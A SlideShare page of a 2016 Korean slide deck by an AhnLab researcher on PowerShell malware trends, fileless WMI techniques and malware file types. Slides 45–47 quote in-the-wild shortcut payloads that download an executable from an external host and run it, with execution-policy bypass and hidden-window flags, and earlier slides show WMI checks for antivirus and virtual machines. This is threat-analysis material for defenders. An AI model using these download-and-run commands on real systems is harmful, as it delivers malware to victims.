SlideShare a Scribd company logo

Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Minseok(Jacky) Cha
Minseok(Jacky) Cha

PowerShell Malware & Fileless Technique

Technology
1 of 66
Download to read offline
PowerMalware ?! 2016.11.18 – 공개판 안랩 시큐리티대응센터(ASEC) 분석팀 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임 연구원 PowerShell 를 이용한 악성코드와 기법
© AhnLab, Inc. All rights reserved. 2 :~$whoami Profile − 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) − 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작 − 1989년 : Brain virus 변형 감염 − 1997년 : AhnLab 입사 − AhnLab 책임 연구원 (Senior Malware Researcher) − 시큐리티 대응센터(ASEC) 분석팀에서 악성코드 분석 및 연구 중 - 민간합동 조사단, 사이버보안 전문단 - vforum, AVED, AMTSO 멤버 - Wildlist Reporter
© AhnLab, Inc. All rights reserved. 3 :~$whoami • 책 -보안에미쳐라(2016) * Source:http://www.yes24.com/24/goods/29333992
© AhnLab, Inc. All rights reserved. 4 시작하기 전에 • 보안이 완벽한 시스템은 이 세상에 없어 - MatthewBroderick주연위험한게임(WarGames) * Source:WarGames(1983)
© AhnLab, Inc. All rights reserved. 5 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
Contents 01 02 03 04 05 06 07 PowerShell PowerShell를 이용한 악성코드 Technique 파일 종류 Fileless Technique Case Study 맺음말
01 PowerShell
© AhnLab, Inc. All rights reserved. 8 PowerShell • PowerShell - 2006년공개된ScriptLanguage -WindowsVista이후기본탑재 * Source:https://msdn.microsoft.com/en-us/powershell
© AhnLab, Inc. All rights reserved. 9 Windows Management Instrumentation (WMI) • WMI - * Source:https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
© AhnLab, Inc. All rights reserved. 10 Windows Management Instrumentation (WMI) • WMIArchitecture - * Source:http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
© AhnLab, Inc. All rights reserved. 11 PowerShell + WMI • AntiVirus제품 정보 얻기 - get-wmiobject -Namespace rootSecurityCenter2 -Class AntiVirusProduct
© AhnLab, Inc. All rights reserved. 12 PowerShell + WMI • 가상환경 검사 - Get-WmiObject –Class Win32_ComputerSystem
02 PowerShell을 이용한 악성코드
© AhnLab, Inc. All rights reserved. Timeline Monad 발표 1993 1998 2000 2004 2006 2007 2013 2014 2015 Poweliks 2016 PowerShell 공개 PowerShell + Macro 등장 VB Script 악성코드 PowerShell Downloader 범람 PowerShell 악성코드 POC Macro virus 2017 Loveletter PowerShell Ransomware Kovter 향상된 Batch virus BedepPhase WMI 이용한 Fileless 침해사고
© AhnLab, Inc. All rights reserved. 15 1995 – Macro virus • 1995년 – 2001년: Macro virus전성기 - * Source:
© AhnLab, Inc. All rights reserved. 16 2000 - Loveletter • 2000년 5월 4일 LoveLettervirus - email로전파 -Iloveyou라는메일제목의사회공학기법사용 -그림,음악파일파괴
© AhnLab, Inc. All rights reserved. 17 2004 – Monad • 우려 - 2004년Monad개발 * Source:https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
© AhnLab, Inc. All rights reserved. 18 2006 - PowerShell 악성코드 POC • PowerShellPOC 악성코드 - * Source:https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
© AhnLab, Inc. All rights reserved. 19 2006 - PowerShell Released • PowerShellReleased - * Source:http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
© AhnLab, Inc. All rights reserved. 20 2013 – PowerShell Ransomware • PowerShellRansomware등장 - * Source:https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
© AhnLab, Inc. All rights reserved. 21 2014 - Poweliks • Poweliks -Registry내저장 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
© AhnLab, Inc. All rights reserved. 22 2014 - Phase • Phase -2013년발견된Solarbot변형 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
© AhnLab, Inc. All rights reserved. 23 2015 – WMI 악용 • Black Hat2015 - * Source:https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A- Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
© AhnLab, Inc. All rights reserved. 24 2015 - PowerShell 악성코드 증가 시작 • PowerShell악성코드 증가 - * Source:https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
© AhnLab, Inc. All rights reserved. 25 2016 - Macro + PowerShell • Macro + PowerShell - * Source:http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
© AhnLab, Inc. All rights reserved. 26 2016 - PowerShell 이용한 악성코드 유행 • PowerShell이용한 악성코드 유행 - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
03 Technical
© AhnLab, Inc. All rights reserved. In-the-Wild 악성코드 조건 조건 많은 사용자 보안 체계 허점 손쉬운 제작
© AhnLab, Inc. All rights reserved. PowerShell 악성코드 장점 장점 강력한 기능 손쉬운 제작 행위 기반 제품 우회 가능성
© AhnLab, Inc. All rights reserved. 30 주요 감염 경로 • 주요 감염 경로 Mail − 첨부 파일 혹은 Link icon Web Browser − Exploit Kit 이용 − Fileless 악성코드 감염에도 이용
© AhnLab, Inc. All rights reserved. 31 감염 경로 • Mail -
© AhnLab, Inc. All rights reserved. 32 PowerShell 실행 • 실행 권한 - DownloadFile명령의개별명령과스크립트실행테스트 -개별명령은실행되지만스크립트는정책상실행되지않음
© AhnLab, Inc. All rights reserved. 33 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:https://technet.microsoft.com/en-us/library/ee176847.aspx
© AhnLab, Inc. All rights reserved. 34 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
© AhnLab, Inc. All rights reserved. 35 기능 • Downloader혹은 Dropper - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
04 파일 종류
© AhnLab, Inc. All rights reserved. 종류 종류 Office (DOC, DOCM, XLS, XLSM) Shortcut (LNK) PowerShell (PS1) Windows ScriptFile (WSF), HTML Application (HTA) Java Script /Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
© AhnLab, Inc. All rights reserved. 38 Java Script - JS • JavaScript(JS) -
© AhnLab, Inc. All rights reserved. 39 Visual Basic Script • VisualBasicScript(VBS) -
© AhnLab, Inc. All rights reserved. 40 Windows Script File (WSF) • WSF(WindowsScriptFile) - 대부분JavaScript
© AhnLab, Inc. All rights reserved. 41 Windows Script File (WSF) • WSF(WindowsScriptFile) -
© AhnLab, Inc. All rights reserved. 42 HTMLApplication (HTA) • HTMLApplication(HTA) -대부분JavaScript
© AhnLab, Inc. All rights reserved. 43 Office (DOC, DOCM, XLS, XLSM) • Macro 포함 문서 -
© AhnLab, Inc. All rights reserved. 44 Shortcut (LNK) • LNK -
© AhnLab, Inc. All rights reserved. 45 Shortcut (LNK) • Download - %WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
© AhnLab, Inc. All rights reserved. 46 Shortcut (LNK) • Download - C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%Example.exe'); cmd /c '%APPDATA%Example.exe'
© AhnLab, Inc. All rights reserved. 47 Shortcut (LNK) • Encoding - C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe powershell.exe -EncodedCommand UABvAHc………
© AhnLab, Inc. All rights reserved. 48 PowerShell (PS1) • PowerShell -
05 Fileless Technique
© AhnLab, Inc. All rights reserved. 50 Fileless • FilelessTechnique으로이용 -Poweliks * Source:https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
© AhnLab, Inc. All rights reserved. 51 Fileless • FilelessTechnique으로이용 -Poweliks
© AhnLab, Inc. All rights reserved. 52 Fileless 악성코드 • Kovter - Run항목읽을수없음
© AhnLab, Inc. All rights reserved. 53 Fileless 악성코드 • Kovter -mshta.exe를통해Script실행
© AhnLab, Inc. All rights reserved. 54 Fileless 악성코드 • Kovter -인코딩된데이터
06 Case Study
07 맺음말
© AhnLab, Inc. All rights reserved. 57 Error • WindowsPowerShell작동 중지 - 갑자기WindowsPowerShell에러가발생할수있음
© AhnLab, Inc. All rights reserved. 58 Response • WMI for Detectionand Response - * Source:https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
© AhnLab, Inc. All rights reserved. 59 전망 • PowerShell의확장 - * Source:https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
© AhnLab, Inc. All rights reserved. 전망 전망 JS, VBS 대체 ?! Obfuscation Cross-Platform
© AhnLab, Inc. All rights reserved. 61 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
© AhnLab, Inc. All rights reserved. 62 현재의 보안 문제 • Not reallya fair fight * source:http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
© AhnLab, Inc. All rights reserved. 63 현재의 보안 문제 • 모두가 함께 해야 하는 보안 * source:http://www.security-marathon.be/?p=1786
© AhnLab, Inc. All rights reserved. 64 Q&A email : minseok.cha@ahnlab.com / mstoned7@gmail.com http://xcoolcat7.tistory.com https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
© AhnLab, Inc. All rights reserved. 65 Reference • Ryan Kazanciyan& Matt Hastings,‘InvestigatingPowerShellAttack’,2014 • Matt Graeber, ‘Abusing WindowsManagementInstrumentation(WMI) to Builda Persistent, Asyncronous,andFilelessBackdoor’,2015 • Santiago M.Pontiroli &F. Roberto Martinez, ‘TheTao of .NETand PowerShellMalwareAnalysis’,2015 • 김승훈/AhnLab,‘매크로 다운로더 분석’, 2016
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Recommended

임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Minseok(Jacky) Cha
 
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Minseok(Jacky) Cha
 
Tick group @avar2019 20191111 cha minseok_publish
Tick group @avar2019 20191111 cha minseok_publishTick group @avar2019 20191111 cha minseok_publish
Tick group @avar2019 20191111 cha minseok_publish
Minseok(Jacky) Cha
 
From stealing confidential data to revenue-generating attacks
From stealing confidential data to revenue-generating attacksFrom stealing confidential data to revenue-generating attacks
From stealing confidential data to revenue-generating attacks
Minseok(Jacky) Cha
 
Real-Time Static Malware Analysis using NepenthesFE
Real-Time Static Malware Analysis using NepenthesFEReal-Time Static Malware Analysis using NepenthesFE
Real-Time Static Malware Analysis using NepenthesFE
Wasim Halani
 
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
CODE BLUE
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automated
Zoltan Balazs
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
 

Recommended

임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Minseok(Jacky) Cha
 
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Minseok(Jacky) Cha
 
Tick group @avar2019 20191111 cha minseok_publish
Tick group @avar2019 20191111 cha minseok_publishTick group @avar2019 20191111 cha minseok_publish
Tick group @avar2019 20191111 cha minseok_publish
Minseok(Jacky) Cha
 
From stealing confidential data to revenue-generating attacks
From stealing confidential data to revenue-generating attacksFrom stealing confidential data to revenue-generating attacks
From stealing confidential data to revenue-generating attacks
Minseok(Jacky) Cha
 
Real-Time Static Malware Analysis using NepenthesFE
Real-Time Static Malware Analysis using NepenthesFEReal-Time Static Malware Analysis using NepenthesFE
Real-Time Static Malware Analysis using NepenthesFE
Wasim Halani
 
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
CODE BLUE
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automated
Zoltan Balazs
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
 
Next Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and DefenseNext Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and Defense
Luca Simonelli
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
Andrew Morris
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
OSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adwareOSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adware
Amit Serper
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Andrew Morris
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
Sunny Neo
 
Malware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade DetectionMalware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade Detection
Lastline, Inc.
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
 
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Lastline, Inc.
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
Security Weekly
 
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
CODE BLUE
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
grecsl
 
[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
Aj MaChInE
 
Computer security
Computer securityComputer security
Computer security
Mohamed Abdo
 

More Related Content

What's hot

OSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adwareOSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adware
Amit Serper
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Andrew Morris
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
 
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
CODE BLUE
 

What's hot (20)

Next Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and DefenseNext Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and Defense
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
OSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adwareOSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adware
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Malware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade DetectionMalware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade Detection
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
 
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
 
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
 

Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Open Source Malware Lab
Open Source Malware LabOpen Source Malware Lab
Open Source Malware Lab
ThreatConnect
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usage
djenoalbania
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
ThreatReel Podcast
 
EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22
MichaelM85042
 
AppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 PrimerAppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 Primer
ThreatReel Podcast
 
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
MichaelM85042
 

Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판 (20)

[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
 
Computer security
Computer securityComputer security
Computer security
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
 
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0
 
Introduction to Exploitation
Introduction to ExploitationIntroduction to Exploitation
Introduction to Exploitation
 
Backtrack
BacktrackBacktrack
Backtrack
 
Open Source Malware Lab
Open Source Malware LabOpen Source Malware Lab
Open Source Malware Lab
 
Security Handbook
Security Handbook Security Handbook
Security Handbook
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usage
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
 
EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22
 
AppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 PrimerAppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 Primer
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoMalware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence Morocco
 
Securitytools
SecuritytoolsSecuritytools
Securitytools
 
